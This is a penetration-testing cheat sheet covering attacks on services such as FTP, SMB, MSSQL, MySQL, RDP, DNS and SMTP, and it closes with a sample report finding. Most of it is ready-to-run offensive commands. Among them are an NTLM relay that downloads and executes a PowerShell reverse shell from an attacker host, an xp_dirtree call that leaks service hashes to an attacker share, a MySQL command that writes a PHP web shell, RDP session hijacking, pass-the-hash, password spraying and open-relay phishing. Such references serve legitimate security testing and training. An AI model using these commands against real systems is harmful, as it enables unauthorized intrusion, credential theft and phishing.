π‘οΈ Methodology Checklist
- For each open service: banner grab β version β CVE research
- Test anonymous/null authentication first
- Try default credentials before brute-force
- Check for writable access (file upload, command exec)
- Capture/relay NTLM hashes where possible
- Document all service versions and vulnerabilities found
- Prioritise services providing direct code execution or credential access
π― Operational Context
Use when: Quick reference for service attack sequence β FTP to WinRM, ordered by protocol and attack type. Think Dumber First: For each exposed port: 1) Banner grab 2) Anonymous/default creds 3) searchsploit version 4) nmap vuln scripts. In that order, every time. Donβt skip straight to CVE hunting without checking default creds first. Skip when: N/A β reference document.
β‘ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
sudo nmap -sC -sV -p- --min-rate=1000 [TARGET_IP] -oN service_scan.txt | Full port scan with version detection |
netexec smb [TARGET_IP] -u '' -p '' --shares | SMB null session share list |
smbmap -H [TARGET_IP] -u null -r [SHARE] | SMBMap recursive listing |
./enum4linux-ng.py [TARGET_IP] -A -C | Full SMB/RPC user + share enumeration |
rpcclient -U '%' [TARGET_IP] | Manual RPC null session |
netexec smb [SUBNET]/24 --gen-relay-list relay_targets.txt | Find SMB signing disabled hosts |
nmap -Pn -sV -sC -p1433,3306 [TARGET_IP] | SQL service scan |
dig mx [DOMAIN] | grep "MX" | grep -v ";" | Find mail servers |
smtp-user-enum -M RCPT -U [USER_LIST] -D [DOMAIN] -t [TARGET_IP] | Enumerate SMTP users |
dig AXFR @[NAMESERVER_IP] [DOMAIN] | DNS zone transfer |
./subbrute.py [DOMAIN] -s [WORDLIST] -r resolvers.txt | Internal DNS subdomain brute-force |
nmap -p 445 --script smb-vuln-cve2020-0796 [TARGET_IP] | SMBGhost check |
nmap -p3389 --script rd-vuln-bluekeep [TARGET_IP] | BlueKeep check |
nmap -p25 --script smtp-open-relay [TARGET_IP] | Open relay check |
ftp [TARGET_IP] β anonymous | FTP anonymous login |
curl -k -X PUT -H "Host: [TARGET_IP]" --basic -u [USER]:[PASS] --data-binary "PoC." --path-as-is https://[TARGET_IP]/../../../../../../whoops | CoreFTP CVE-2022-22836 |
nmap -Pn -v -n -p 80 -b anonymous:password@[FTP_IP] [INTERNAL_IP] | FTP bounce attack |
sudo mount -t cifs -o username=[USER],password=[PASS],domain=. //[TARGET_IP]/[SHARE] /mnt/[MOUNT] | Mount SMB share on Linux |
findstr /s /i cred n:\*.* | Grep mounted share for βcredβ (CMD) |
impacket-psexec [USER]:[PASS]@[TARGET_IP] | SMB shell (PsExec) |
impacket-smbexec [USER]:[PASS]@[TARGET_IP] | SMB shell (SMBExec, stealthier) |
impacket-ntlmrelayx --no-http-server -smb2support -t [TARGET_IP] -c 'powershell -c "IEX(New-Object Net.WebClient).DownloadString(\"http://[LHOST]/shell.ps1\")"' | NTLM relay to reverse shell |
mssqlclient.py -p 1433 [USER]@[TARGET_IP] | Connect MSSQL (Impacket) |
mssqlclient.py -windows-auth [DOMAIN]/[USER]:[PASS]@[TARGET_IP] | Connect MSSQL with Windows auth |
mysql -u [USER] -p[PASS] -h [TARGET_IP] | Connect MySQL |
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; xp_cmdshell 'whoami'; | MSSQL: enable + execute system command |
EXEC master..xp_dirtree '\\[LHOST]\share\'; | MSSQL: steal service account hash via xp_dirtree |
SELECT "<?php system($_GET['c']); ?>" INTO OUTFILE '/var/www/html/shell.php'; | MySQL: write web shell |
python3 opensmtpd_exploit.py [TARGET_IP] 25 "[COMMAND]" | OpenSMTPD RCE (CVE-2020-7247) |
crowbar -b rdp -s [TARGET_IP]/32 -U [USER_LIST] -c '[PASS]' | RDP spray (Crowbar) |
xfreerdp /v:[TARGET_IP] /u:[USER] /pth:[NT_HASH] | RDP Pass-the-Hash |
query user | List active RDP sessions (on target) |
sc.exe create sessionhijack binpath= "cmd.exe /k tscon [SESSION_ID] /dest:[OUR_SESSION]" && net start sessionhijack | RDP session hijack (SYSTEM via service) |
python3 o365spray.py --validate --domain [DOMAIN] | Check if domain uses O365 |
python3 o365spray.py --spray -U users.txt -p '[PASS]' --count 1 --lockout 1 --domain [DOMAIN] | O365 password spray |
swaks --from [FROM] --to [TO] --body '[MSG]' --server [TARGET_IP] | Send email via open relay (phishing) |
π¬ Deep Dive & Workflow
Service-to-Attack Quick Reference
| Service | Port | First Checks | Key Attacks |
|---|---|---|---|
| FTP | 21 | Anonymous access, write perms | Upload web shell, bounce scan, CVE-2022-22836 |
| SMB | 139/445 | Null session, share listing | Relay, PsExec, session hijack via share |
| MSSQL | 1433 | Default sa creds, Windows auth | xp_cmdshell, xp_dirtree, impersonation, linked servers |
| MySQL | 3306 | root with no password | File read/write, web shell |
| RDP | 3389 | Spraying, PtH | Session hijack, BlueKeep |
| DNS | 53 | Zone transfer, subdomain enum | Spoofing, subdomain takeover |
| SMTP | 25 | User enum (VRFY/RCPT TO), open relay | Spoofed phishing, OpenSMTPD RCE |
CVE Quick Reference
| CVE | Service | Condition | Impact |
|---|---|---|---|
| CVE-2022-22836 | CoreFTP | Authenticated | Arbitrary file write |
| CVE-2020-0796 (SMBGhost) | SMB 3.1.1 | Unauthenticated | SYSTEM RCE (BSoD risk) |
| CVE-2019-0708 (BlueKeep) | RDP | Unauthenticated | SYSTEM RCE (BSoD risk) |
| CVE-2020-7247 | OpenSMTPD < 6.6.2 | Unauthenticated | Root RCE |
π οΈ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| Unsure which tool to use for service | Multiple options available | Prefer nxc for SMB/WinRM/LDAP; impacket for Kerberos/NTLM; nmap scripts for enumeration |
| Service responds but all auth fails | Protocol-specific auth issue | Verify: protocol version compatibility; try multiple auth methods (NTLM, Basic, Kerberos) |
| Cheat sheet command syntax outdated | Tool updates changed flags | Verify with --help; many tools (nxc vs cme) changed flag names in major versions |
| Port open but service unresponsive | SSL/TLS required | Try with TLS: append s to protocol or add --ssl flag; test with openssl s_client -connect [TARGET]:[PORT] |
| Multiple services on same port | Multiplex or redirect | Use nmap -sV to identify actual service; service may respond differently to protocol-specific probes |
π Reporting Trigger
Finding Title: Multiple Exposed Services Present Broad Attack Surface Impact: Multiple exposed network services (FTP, SMTP, SMB, SQL, RDP) each represent independent attack vectors. Compromise of any single service provides initial access for post-exploitation pivoting. Root Cause: Insufficient network segmentation and unnecessary service exposure. Services enabled by default without assessing operational necessity. Recommendation: Implement firewall rules limiting service exposure to required source networks. Disable all unnecessary services. Conduct regular network service audits. Apply defense-in-depth with authentication and authorization controls on each service.